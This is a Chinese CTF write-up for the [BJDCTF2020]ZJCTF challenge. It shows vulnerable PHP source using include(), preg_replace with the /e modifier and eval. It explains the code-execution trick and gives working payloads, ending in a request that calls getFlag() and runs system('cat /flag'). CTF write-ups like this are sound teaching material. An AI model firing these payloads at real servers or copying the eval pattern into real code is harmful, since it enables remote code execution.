安科网

[BJDCTF2020]ZJCTF,不过如此

山水沐光

山水沐光

2020-05-14

关注 关注

 

知识点

  • php://input
  • filter伪协议
  • preg_replace() /e模式命令执行
    题目源码
<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,‘r‘)==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,‘r‘)."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

读取一下next.php


[BJDCTF2020]ZJCTF,不过如此

#next.php
<?php
$id = $_GET[‘id‘];
$_SESSION[‘id‘] = $id;

function complex($re, $str) {
    return preg_replace(
        ‘/(‘ . $re . ‘)/ei‘,
        ‘strtolower("\\1")‘,
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET[‘cmd‘]);
}

preg_replace

preg_replace(pattern, replacement, subject)

当pattern传入的正则表达式带有/e时,存在命令执行,即当匹配到符合正则表达式的字符串时,第二个参数的字符串可被当做代码来执行。
这里第二个参数固定为strtolower("\\1")
这里的\\1实际上体现为\1
w3cschool

反向引用
对一个正则表达式模式或部分模式两边添加圆括号将导致相关匹配存储到一个临时缓冲区中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问

这里的\1指的是第一个匹配项
官方payload/?.*={${phpinfo()}}

<?php
preg_replace(‘/(.*)/ei‘,‘strtolower("\\1")‘,‘{${phpinfo()}}‘);

[BJDCTF2020]ZJCTF,不过如此

但这里存在的问题是,GET方式传的字符串,.会被替换成_,这里采用

\S*=${phpinfo()}  #\S 在php正则表达式中表示匹配所有非空字符,*表示多次匹配


最终payload

/next.php?\S*=${getFlag()}&cmd=system(‘cat /flag‘);


参考
深入研究preg_replace与代码执行

preg_replace

山水沐光

山水沐光

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

PHP正则表达式函数preg_replace用法实例分析

本文实例讲述了PHP正则表达式函数preg_replace用法。分享给大家供大家参考,具体如下:。要进行搜索和替换的字符串或字符串数组。每个模式在每个subject上进行替换的最大次数。默认是 -1(无限)。// $1对应(\w+),${1}a是区别$1a

君子务本 2020-06-13

[PHP] PHP7已经删除了preg_replace的e修饰符

官网提示是这样的,对/e修饰符的支持已删除。

Nicolase 2019-12-30

[转]关于PHP7的新特性

如果设置了这个被弃用的修饰符, preg_replace() 在进行了对替换字符串的 后向引用替换之后, 将替换后的字符串作为php 代码评估执行,并使用执行结果 作为实际参与替换的字符串。单引号、双引号、反斜线()和 NULL 字符在 后向引用替换时会被

JF0 2019-10-19

Replace of HTML tag

$str=preg_replace("/<[ ]+/si","<",$str); //过滤<__("<"号后面带空格). $str=preg_replace("/

XxZproject 2016-11-16

Replace of HTML tag

$str=preg_replace("/<[ ]+/si","<",$str); //过滤<__("<"号后面带空格). $str=preg_replace("/

wugangsunny 2016-11-16

过滤在线编辑器产生的不安全html代码

过滤在线编辑器产生的不安全html代码;* @copyright 版权所无,任意传播.* @notice 此版本只过滤js,框架,表单。作者能力有限,使用本程序若产生任何安全问题,与本人无关。欢迎来信与我交流。)>/si","&a

帅的相对论 2015-12-16

php过滤html标签

$str=preg_replace("/<\s*img\s+[^>]*?src\s*=\s*(\'|\")(.*?)\\1[^>]*?\/?\s*>/i","",$str);$str

wugangsunny 2015-02-09

PHP字符串操作-正则表达式和替换函数

一般字符串的验证或多或少都会用到正则表达式。PHP对正则表达式的支持相当丰富,有POSIX和PEAR两种格式的正则表达式语法支持。下面就PEAR格式的常用正则表达式进行一些实例展示。看一个最简单的例子:';?[a-zA-Z0-9_]表示包含小写、大写字母以

dabian 2012-07-06

preg_replace正则表达式

+ $content = preg_replace('/<tr[^>]*>[\s]*<td[^>]*>[\s]*周比较[\s]*<\/td>[\s\S]*?

fakerac 2012-09-11

正则表达式之正则处理函数

前面我们已经学习了正则表达式的基础语法,包括了定界符、原子、元字符和模式修正 符。实际上正则表达式想要起作用的话,就必须借用正则表达式处理函数。本节我们就来介绍一下PHP中基于perl的正则表达式处理函数,主要包含了分割, 匹配,查找,替换等等处理操作,依

longpersevere 2012-04-28

详解PHP正则表达式替换实现

首先向你介绍下PHP preg_replace,PHP preg_replace的使用是我们实现的方法,那么对于PHP正则表达式替换实现过程我们从实例入手。mixedsubject[,intlimit])preg_replace:允许你替换字符串中匹配到你

laolaolai 2009-09-16

phpMyAdmin preg_replace()远程PHP代码执行(CVE-2013-3238)

受影响系统:phpMyAdmin phpMyAdmin < 3.5.8.1描述:--------------------------------------------------------------------------------BUGTR

lcyltpsr 2013-04-26

php使用正则表达式去掉html中的注释方法

最近在项目中在需要输出浏览器中的源文件需要去掉html中的注释,在网上看了很多的方案,不过很多的答案都是一样的,并不能解决我的问题,于是就自己写正则表达式,也对正则有了更加深刻的理解。var_dump($a);上面的代码会输出ceshi。--ceshi//

WangJiangNan 2019-04-16

php制作简单模版引擎

PHP模板引擎就是一个PHP类库,使用它可以使PHP代码和HTML代码进行分离,使代码的可读性和维护性得到显著提高。而且这样做的好处是,让美工专心设计HTML前台页面,程序员专心去写PHP业务逻辑。因此,模化引擎很适合公司的Web开发团队使用,使每个人都能

phpyounger 2016-04-07

php过滤HTML标签、属性等正则表达式汇总

$str=preg_replace("/<[ ]+/si","<",$str); //过滤<__("<"号后面带空格). $str=preg_replace("/

杨柳天下 2019-04-09

正则表达式模式修饰符

如果设置了这个修饰符,模式中的字母会进行大小写不敏感匹配。这个行为和 perl 相同。如果设置了这个被弃用的修饰符, preg_replace() 在进行了对替换字符串的 后向引用替换之后, 将替换后的字符串作为php 代码评估执行,并使用执行结果 作为实

crqzcbk 2019-04-05

详解PHP正则表达式替换实现(PHP preg_replace,PHP preg_replace)

首先向你介绍下PHP preg_replace,PHP preg_replace的使用是我们实现的方法,那么对于PHP正则表达式替换实现过程我们从实例入手。mixed subject [, int limit])preg_replace:允许你替换字符串中

Passerby 2019-04-04

php正则替换变量指定字符的方法

本文实例讲述了php正则替换变量指定字符的方法。分享给大家供大家参考。这里介绍三种常用方法.$txt = '我的呢称(银子)';>三种方法都返回同样结果.. PHP中的Perl风格正则与Perl完全一样.连quotemeta也是通用的..//匹配ba

jingan欢迎您来访 2015-03-24

PHP中过滤常用标签的正则表达式

我们常常会用到PHP过滤一些标签的功能,比如过滤链接标签、过滤script标签等等,下面就介绍一下PHP过滤常用标签的正则表达式代码:

daoyongyu 2019-04-03

正则用(?&gt;…)实现固化分组提高效率

  也就是说,在固化分组匹配结束时,它已经匹配的文本已经固化为一个单元,只能作为整体而保留或放弃。括号内的子表达式中未尝试过的备用状态都不复存在了,所以回溯永远也不能选择其中的状态。例子:   比如要处理一批数据,原来格式为123.456,后来因为浮点数显

jingan欢迎您来访 2012-10-07
山水沐光

山水沐光

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号